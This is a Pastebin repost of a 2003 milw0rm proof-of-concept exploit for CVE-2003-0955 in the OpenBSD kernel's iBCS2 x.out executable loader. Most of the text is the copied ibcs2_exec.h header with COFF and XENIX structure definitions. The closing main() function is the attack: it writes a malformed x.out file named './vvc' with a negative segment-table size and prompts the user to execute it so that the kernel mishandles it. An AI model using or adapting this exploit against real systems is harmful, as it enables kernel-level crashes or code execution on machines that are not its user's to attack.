Advertisement
FlyFar

OpenBSD - 'ibcs2_exec' Kernel Code Execution - CVE-2003-0955

Feb 23rd, 2024
779
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 8.60 KB | Cybersecurity | 0 0
  1. //
  2. // Patch ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patch
  3. //
  4. #include <sys/types.h>
  5. #include <sys/stat.h>
  6. #include <fcntl.h>
  7. #include <stdio.h>
  8. /* $OpenBSD: ibcs2_exec.h,v 1.3 2002/03/14 01:26:50 millert Exp $ */
  9. /* $NetBSD: ibcs2_exec.h,v 1.4 1995/03/14 15:12:24 scottb Exp $ */
  10.  
  11. /*
  12.  * Copyright (c) 1994, 1995 Scott Bartram
  13.  * All rights reserved.
  14.  *
  15.  * adapted from sys/sys/exec_ecoff.h
  16.  * based on Intel iBCS2
  17.  *
  18.  * Redistribution and use in source and binary forms, with or without
  19.  * modification, are permitted provided that the following conditions
  20.  * are met:
  21.  * 1. Redistributions of source code must retain the above copyright
  22.  * notice, this list of conditions and the following disclaimer.
  23.  * 2. Redistributions in binary form must reproduce the above copyright
  24.  * notice, this list of conditions and the following disclaimer in the
  25.  * documentation and/or other materials provided with the distribution.
  26.  * 3. The name of the author may not be used to endorse or promote products
  27.  * derived from this software without specific prior written permission
  28.  *
  29.  * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
  30.  * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
  31.  * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
  32.  * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
  33.  * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
  34.  * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
  35.  * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
  36.  * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
  37.  * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
  38.  * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
  39.  */
  40.  
  41. #ifndef _IBCS2_EXEC_H_
  42. #define _IBCS2_EXEC_H_
  43.  
  44. /*
  45.  * COFF file header
  46.  */
  47.  
  48. struct coff_filehdr {
  49.     u_short f_magic; /* magic number */
  50.     u_short f_nscns; /* # of sections */
  51.     long f_timdat; /* timestamp */
  52.     long f_symptr; /* file offset of symbol table */
  53.     long f_nsyms; /* # of symbol table entries */
  54.     u_short f_opthdr; /* size of optional header */
  55.     u_short f_flags; /* flags */
  56. };
  57.  
  58. /* f_magic flags */
  59. #define COFF_MAGIC_I386 0x14c
  60.  
  61. /* f_flags */
  62. #define COFF_F_RELFLG 0x1
  63. #define COFF_F_EXEC 0x2
  64. #define COFF_F_LNNO 0x4
  65. #define COFF_F_LSYMS 0x8
  66. #define COFF_F_SWABD 0x40
  67. #define COFF_F_AR16WR 0x80
  68. #define COFF_F_AR32WR 0x100
  69.  
  70. /*
  71.  * COFF system header
  72.  */
  73.  
  74. struct coff_aouthdr {
  75.     short a_magic;
  76.     short a_vstamp;
  77.     long a_tsize;
  78.     long a_dsize;
  79.     long a_bsize;
  80.     long a_entry;
  81.     long a_tstart;
  82.     long a_dstart;
  83. };
  84.  
  85. /* magic */
  86. #define COFF_OMAGIC 0407 /* text not write-protected; data seg
  87. is contiguous with text */
  88. #define COFF_NMAGIC 0410 /* text is write-protected; data starts
  89. at next seg following text */
  90. #define COFF_ZMAGIC 0413 /* text and data segs are aligned for
  91. direct paging */
  92. #define COFF_SMAGIC 0443 /* shared lib */
  93.  
  94. /*
  95.  * COFF section header
  96.  */
  97.  
  98. struct coff_scnhdr {
  99.     char s_name[8];
  100.     long s_paddr;
  101.     long s_vaddr;
  102.     long s_size;
  103.     long s_scnptr;
  104.     long s_relptr;
  105.     long s_lnnoptr;
  106.     u_short s_nreloc;
  107.     u_short s_nlnno;
  108.     long s_flags;
  109. };
  110.  
  111. /* s_flags */
  112. #define COFF_STYP_REG 0x00
  113. #define COFF_STYP_DSECT 0x01
  114. #define COFF_STYP_NOLOAD 0x02
  115. #define COFF_STYP_GROUP 0x04
  116. #define COFF_STYP_PAD 0x08
  117. #define COFF_STYP_COPY 0x10
  118. #define COFF_STYP_TEXT 0x20
  119. #define COFF_STYP_DATA 0x40
  120. #define COFF_STYP_BSS 0x80
  121. #define COFF_STYP_INFO 0x200
  122. #define COFF_STYP_OVER 0x400
  123. #define COFF_STYP_SHLIB 0x800
  124.  
  125. /*
  126.  * COFF shared library header
  127.  */
  128.  
  129. struct coff_slhdr {
  130. long entry_len; /* in words */
  131. long path_index; /* in words */
  132. char sl_name[1];
  133. };
  134.  
  135. #define COFF_ROUND(val, by) (((val) + by - 1) & ~(by - 1))
  136.  
  137. #define COFF_ALIGN(a) ((a) & ~(COFF_LDPGSZ - 1))
  138.  
  139. #define COFF_HDR_SIZE \
  140. (sizeof(struct coff_filehdr) + sizeof(struct coff_aouthdr))
  141.  
  142. #define COFF_BLOCK_ALIGN(ap, value) \
  143.         (ap->a_magic == COFF_ZMAGIC ? COFF_ROUND(value, COFF_LDPGSZ) : \
  144.          value)
  145.  
  146. #define COFF_TXTOFF(fp, ap) \
  147.         (ap->a_magic == COFF_ZMAGIC ? 0 : \
  148.          COFF_ROUND(COFF_HDR_SIZE + fp->f_nscns * \
  149. sizeof(struct coff_scnhdr), COFF_SEGMENT_ALIGNMENT(ap)))
  150.  
  151. #define COFF_DATOFF(fp, ap) \
  152.         (COFF_BLOCK_ALIGN(ap, COFF_TXTOFF(fp, ap) + ap->a_tsize))
  153.  
  154. #define COFF_SEGMENT_ALIGN(ap, value) \
  155.         (COFF_ROUND(value, (ap->a_magic == COFF_ZMAGIC ? COFF_LDPGSZ : \
  156.          COFF_SEGMENT_ALIGNMENT(ap))))
  157.  
  158. #define COFF_LDPGSZ 4096
  159.  
  160. #define COFF_SEGMENT_ALIGNMENT(ap) 4
  161.  
  162. #define COFF_BADMAG(ex) (ex->f_magic != COFF_MAGIC_I386)
  163.  
  164. #define IBCS2_HIGH_SYSCALL(n) (((n) & 0x7f) == 0x28)
  165. #define IBCS2_CVT_HIGH_SYSCALL(n) (((n) >> 8) + 128)
  166.  
  167. struct exec_package;
  168. int exec_ibcs2_coff_makecmds(struct proc *, struct exec_package *);
  169.  
  170. /*
  171.  * x.out (XENIX)
  172.  */
  173.  
  174. struct xexec {
  175. u_short x_magic; /* magic number */
  176. u_short x_ext; /* size of extended header */
  177. long x_text; /* ignored */
  178. long x_data; /* ignored */
  179. long x_bss; /* ignored */
  180. long x_syms; /* ignored */
  181. long x_reloc; /* ignored */
  182. long x_entry; /* executable entry point */
  183. char x_cpu; /* processor type */
  184. char x_relsym; /* ignored */
  185. u_short x_renv; /* flags */
  186. };
  187.  
  188. /* x_magic flags */
  189. #define XOUT_MAGIC 0x0206
  190.  
  191. /* x_cpu flags */
  192. #define XC_386 0x004a /* 386, word-swapped */
  193.  
  194. /* x_renv flags */
  195. #define XE_V5 0xc000
  196. #define XE_SEG 0x0800
  197. #define XE_ABS 0x0400
  198. #define XE_ITER 0x0200
  199. #define XE_VMOD 0x0100
  200. #define XE_FPH 0x0080
  201. #define XE_LTEXT 0x0040
  202. #define XE_LDATA 0x0020
  203. #define XE_OVER 0x0010
  204. #define XE_FS 0x0008
  205. #define XE_PURE 0x0004
  206. #define XE_SEP 0x0002
  207. #define XE_EXEC 0x0001
  208.  
  209. /*
  210.  * x.out extended header
  211.  */
  212.  
  213. struct xext {
  214. long xe_trsize; /* ignored */
  215. long xe_drsize; /* ignored */
  216. long xe_tbase; /* ignored */
  217. long xe_dbase; /* ignored */
  218. long xe_stksize; /* stack size if XE_FS set in x_renv */
  219. long xe_segpos; /* offset of segment table */
  220. long xe_segsize; /* segment table size */
  221. long xe_mdtpos; /* ignored */
  222. long xe_mdtsize; /* ignored */
  223. char xe_mdttype; /* ignored */
  224. char xe_pagesize; /* ignored */
  225. char xe_ostype; /* ignored */
  226. char xe_osvers; /* ignored */
  227. u_short xe_eseg; /* ignored */
  228. u_short xe_sres; /* ignored */
  229. };
  230.  
  231. /*
  232.  * x.out segment table
  233.  */
  234.  
  235. struct xseg {
  236. u_short xs_type; /* segment type */
  237. u_short xs_attr; /* attribute flags */
  238. u_short xs_seg; /* segment selector number */
  239. char xs_align; /* ignored */
  240. char xs_cres; /* ignored */
  241. long xs_filpos; /* offset of this segment */
  242. long xs_psize; /* physical segment size */
  243. long xs_vsize; /* virtual segment size */
  244. long xs_rbase; /* relocation base address */
  245. u_short xs_noff; /* ignored */
  246. u_short xs_sres; /* ignored */
  247. long xs_lres; /* ignored */
  248. };
  249.  
  250. /* xs_type flags */
  251. #define XS_TNULL 0 /* unused */
  252. #define XS_TTEXT 1 /* text (read-only) */
  253. #define XS_TDATA 2 /* data (read-write) */
  254. #define XS_TSYMS 3 /* symbol table (noload) */
  255. #define XS_TREL 4 /* relocation segment (noload) */
  256. #define XS_TSESTR 5 /* string table (noload) */
  257. #define XS_TGRPS 6 /* group segment (noload) */
  258.  
  259. #define XS_TIDATA 64
  260. #define XS_TTSS 65
  261. #define XS_TLFIX 66
  262. #define XS_TDNAME 67
  263. #define XS_TDTEXT 68
  264. #define XS_TDFIX 69
  265. #define XS_TOVTAB 70
  266. #define XS_T71 71
  267. #define XS_TSYSTR 72
  268.  
  269. /* xs_attr flags */
  270. #define XS_AMEM 0x8000 /* memory image */
  271. #define XS_AITER 0x0001 /* iteration records */
  272. #define XS_AHUGE 0x0002 /* unused */
  273. #define XS_ABSS 0x0004 /* uninitialized data */
  274. #define XS_APURE 0x0008 /* read-only (sharable) segment */
  275. #define XS_AEDOWN 0x0010 /* expand down memory segment */
  276. #define XS_APRIV 0x0020 /* unused */
  277. #define XS_A32BIT 0x0040 /* 32-bit text/data */
  278.  
  279. /*
  280.  * x.out iteration record
  281.  */
  282.  
  283. struct xiter {
  284. long xi_size; /* text/data size */
  285. long xi_rep; /* number of replications */
  286. long xi_offset; /* offset within segment to replicated data */
  287. };
  288.  
  289. #define XOUT_HDR_SIZE (sizeof(struct xexec) + sizeof(struct xext))
  290.  
  291. int exec_ibcs2_xout_makecmds(struct proc *, struct exec_package *);
  292.  
  293. #endif /* !_IBCS2_EXEC_H_ */
  294.  
  295. int main(int ac,char **av)
  296. {
  297. int fd;
  298. struct xexec xp;
  299. struct xext xep;
  300. char exe[10];
  301. char fil[]="./vvc";
  302.  
  303. fd=open(fil,O_CREAT|O_RDWR,0700);
  304. if (fd==-1) {perror("open");return 1;}
  305. memset(&xp,0,sizeof(xp));
  306. memset(&xep,0,sizeof(xep));
  307. memset(exe,'v',sizeof(exe));
  308. xp.x_magic = XOUT_MAGIC;
  309. xp.x_cpu = XC_386;
  310. xp.x_renv = XE_EXEC;
  311. xp.x_ext = sizeof(xep);
  312. xep.xe_segsize = -1;
  313. write(fd,&xp,sizeof(xp));
  314. write(fd,&xep,sizeof(xep));
  315. write(fd,exe,sizeof(exe));
  316. printf("Now exec %s\n",fil);
  317.  
  318. }
  319.  
  320. // milw0rm.com [2003-11-07]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement